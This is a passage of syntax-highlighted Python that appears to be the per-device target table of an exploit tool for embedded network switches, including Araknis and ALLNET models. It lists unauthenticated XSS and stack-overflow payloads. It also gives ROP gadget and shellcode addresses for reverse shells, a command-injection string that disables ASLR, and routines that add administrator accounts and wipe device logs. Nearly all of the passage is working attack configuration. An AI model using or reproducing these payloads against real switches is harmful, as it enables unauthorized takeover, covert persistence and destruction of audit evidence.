							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_locallogin.cgi?redirecturl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;userurl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;loginurl=&lt;script&gt;alert(XSS);&lt;/script&gt;'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;password=&lt;script&gt;alert(XSS);&lt;/script&gt;'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.login (XSS)'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'XSS in "userurl &amp; uamip" (PoC: Count passed XSS)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'xss'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.login?cmd=action'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'mac=dummy&amp;res=dummy&amp;userurl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;uamip=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;alertmsg=dummy&amp;called=dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'cpl_logo_ul.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'json'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_logo_ul.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Disposition: filename.png\n------'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'cpl_locallogin.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&amp;userurl=BBBB&amp;loginurl=BBBB'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">196</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "called", XSS in "userurl &amp; uamip" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.login?cmd=action'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'mac=dummy&amp;res=dummy&amp;userurl=dummy&amp;uamip=dummy&amp;alertmsg=dummy&amp;called='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">4100</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.jrpc.dispatch.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.jrpc.dispatch.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"'</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'"},"method":"login"}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.auth'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.auth?user=admin&amp;chap_chal=challenge&amp;chap_pass='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">140</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E15C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24840690</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">6</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># pt: 0 = no password, 1 = cleartext, 2 = encrypted</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x42C334</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pw=PASSWORD&amp;pwn=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x42C334</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x42BCEC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x448008</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x449BE0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x449BE0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42D598</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42D598</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42D598</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'nop=nop&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x100271A0</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Araknis Networks</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'8028-89928'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Araknis'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.2.00_171225-1618'</span><span class="token punctuation">,</span>			<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'AN-310-SW-16-POE'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'http://araknisnetworks.com/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E04C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24840470</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">6</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span> 					<span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x42A494</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;session_uid=0&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_EncrypOnly_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x4303B4</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x42ADB8</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># user</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x44DBD8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x44FC88</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x44FC88</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42BAE4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42BAE4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42BAE4</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token comment"># We need these to push NOP and shellcode on higher heap addresses to avoid 0x00</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span> <span class="token punctuation">(</span>self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;'</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token number">110</span> <span class="token operator">+</span> <span class="token string">'usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token comment">#'query':'a=a&amp;' * 110 + 'usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE',</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span> <span class="token number">0x10600604</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># ALLNET GmbH Computersysteme </span>
			<span class="token comment"># JSON based SG8xxx</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
